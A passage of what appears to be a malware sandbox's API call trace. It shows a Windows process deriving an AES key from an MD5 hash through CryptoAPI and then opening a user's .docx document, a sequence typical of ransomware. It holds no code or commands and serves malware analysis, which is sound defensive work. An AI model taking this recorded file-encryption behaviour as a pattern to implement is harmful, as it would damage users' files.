hHeap=0x770000) returned 1 [0033.100] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0033.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.101] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.101] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.101] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0033.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.101] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.101] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0033.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0033.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0033.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0033.101] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.101] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.101] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0033.101] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0033.101] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.101] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0033.102] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.102] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.102] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0033.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0033.102] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.102] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0033.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0033.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0033.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0033.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0033.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0033.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0033.103] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0033.103] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0033.103] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.103] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0033.103] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.103] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0033.103] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.103] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.103] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.103] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.104] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0033.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.104] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.104] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.104] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0033.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0033.104] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.104] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.104] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.104] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0033.104] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.104] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0033.104] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.104] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.104] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.104] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.104] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.105] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.105] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0033.105] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.105] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0033.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0033.105] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.105] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.105] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0033.105] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.105] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0033.105] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.105] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.105] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0033.105] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.105] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.105] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.105] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0033.105] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.105] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.105] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0033.105] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0033.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.106] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0033.106] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.106] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0033.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0033.106] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.106] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.106] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0033.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0033.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.106] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.106] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0033.106] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.106] CryptDestroyHash (hHash=0x7c2100) returned 1 [0033.106] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.106] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.106] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0033.107] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0033.107] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.107] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hPN6id3lN1N.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hpn6id3ln1n.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.107] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.107] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0033.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0033.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.107] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0033.107] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0033.107] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.107] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0033.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0033.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0033.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0033.108] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 